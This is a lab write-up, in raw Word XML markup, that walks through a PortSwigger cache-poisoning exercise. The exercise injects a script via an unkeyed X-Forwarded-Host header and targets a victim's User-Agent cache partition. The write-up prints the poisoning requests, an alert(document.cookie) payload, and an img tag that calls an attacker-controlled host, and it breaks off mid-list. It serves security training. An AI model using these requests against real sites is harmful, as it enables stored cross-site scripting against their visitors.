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937"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Cache Poisoning via Unkeyed X-Forwarded-Host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4B5563"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Targeting a Specific Victim Using the Vary Header</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:left w:val="none" w:color="D1D5DB" w:sz="0"/>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:right w:val="none" w:color="D1D5DB" w:sz="0"/>
          <w:insideH w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:insideV w:val="none" w:color="D1D5DB" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2600"/>
        <w:gridCol w:w="7000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F9FAFB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PortSwigger Web Security Academy — Expert: Web cache poisoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F9FAFB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Web cache poisoning (unkeyed input + Vary-scoped targeting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F9FAFB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stored, victim-targeted cross-site scripting (XSS) via cache poisoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="F9FAFB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Mohammad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This lab combines two cache poisoning concepts: exploiting an unkeyed header to inject a malicious script reference into a cached response, and using the Vary header to work out which cached copy a specific victim will actually receive. A generic poisoning attempt hits the wrong cache partition and never reaches the target — this writeup covers how to identify the right partition and aim the payload at it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Recon: Confirming the Response Is Cacheable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Starting from GET /, the response headers confirmed the page was being served from a cache. More importantly, the response included:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:left w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:right w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:insideH w:val="none" w:color="D1D5DB" w:sz="0"/>
          <w:insideV w:val="none" w:color="D1D5DB" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F3F4F6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vary: User-Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Vary header tells the cache to treat the listed header as part of the cache key. In practice, this means the cache doesn't store one shared copy of / — it stores a separate cached copy per distinct User-Agent string. This immediately mattered for exploitation: any payload cached under my own User-Agent would only ever be served back to requests carrying that same User-Agent — not to arbitrary visitors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To confirm this experimentally, I added a cache-buster parameter to the request and varied the User-Agent header, watching the X-Cache response header. A miss on the first request with a new User-Agent, followed by a hit on repeat, confirmed User-Agent was genuinely part of the key rather than just declared in Vary without being enforced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Finding the Unkeyed Input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With the keyed inputs identified, I ran Param Miner to fuzz for additional headers the backend might process but the cache might not key on. It flagged X-Forwarded-Host as unkeyed and reflected in the response — specifically, its value was being inserted into a script reference just before /resources/js/tracking.js:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:left w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:right w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:insideH w:val="none" w:color="D1D5DB" w:sz="0"/>
          <w:insideV w:val="none" w:color="D1D5DB" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F3F4F6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script type="text/javascript"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        src="//[X-Forwarded-Host]/resources/js/tracking.js"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the resulting URL is //&lt;attacker-controlled-host&gt;/resources/js/tracking.js, hosting a file at that exact path on infrastructure I control turns this into a script-injection primitive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Building the Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Burp's exploit server, I hosted a file at /resources/js/tracking.js containing:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:left w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:right w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:insideH w:val="none" w:color="D1D5DB" w:sz="0"/>
          <w:insideV w:val="none" w:color="D1D5DB" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F3F4F6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">alert(document.cookie)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I then sent a poisoned request:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:left w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:right w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:insideH w:val="none" w:color="D1D5DB" w:sz="0"/>
          <w:insideV w:val="none" w:color="D1D5DB" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F3F4F6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GET / HTTP/2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: &lt;lab-host&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Forwarded-Host: &lt;exploit-server-id&gt;.exploit-server.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reloading / in my own browser confirmed alert(document.cookie) fired — proving the injection and reflection both worked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Why the Lab Didn't Solve Yet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The lab still reported unsolved at this point. The reason traces back to the Vary: User-Agent behavior established during recon: my poisoning request was cached under the specific User-Agent string my browser/tooling sent. Since the victim's browser almost certainly sends a different User-Agent, they were requesting an entirely different cache partition — one that had never been poisoned. The attack was working; it just wasn't reaching the target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the core lesson of the lab: Vary isn't a mitigation here, it's a targeting mechanism. It splits the cache into per-User-Agent buckets, so the real task became identifying which bucket the victim's requests fall into.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Identifying the Victim's User-Agent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The lab description states that a victim views any newly posted comment. This gave a way to get the application to interact with the victim on my behalf: I posted a comment containing an &lt;img&gt; tag with its src pointing at my exploit server:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:left w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:right w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:insideH w:val="none" w:color="D1D5DB" w:sz="0"/>
          <w:insideV w:val="none" w:color="D1D5DB" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F3F4F6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;img src="https://&lt;exploit-server-id&gt;.exploit-server.net/"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When the victim's browser rendered the comment, it requested that image URL, which landed in the exploit server's access log — along with the User-Agent string the victim's browser sent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Completing the Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With the victim's exact User-Agent in hand, I resent the poisoning request, this time setting the User-Agent header to match the victim's value exactly, alongside the malicious X-Forwarded-Host header:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:left w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:right w:val="single" w:color="D1D5DB" w:sz="4"/>
          <w:insideH w:val="none" w:color="D1D5DB" w:sz="0"/>
          <w:insideV w:val="none" w:color="D1D5DB" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F3F4F6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">GET / HTTP/2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: &lt;lab-host&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">User-Agent: &lt;victim's User-Agent string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Forwarded-Host: &lt;exploit-server-id&gt;.exploit-server.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This poisoned the specific cache partition the victim's browser would actually read from. On their next visit to /, the malicious script loaded and executed in their browser, and the lab was marked solved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D1D5DB" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vary headers reveal cache segmentation, not just caching hints. Any header listed in Vary tells you the cache stores multiple parallel copies of a response — one per distinct value of that header — which is directly useful for an attacker trying to reach a specific audience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
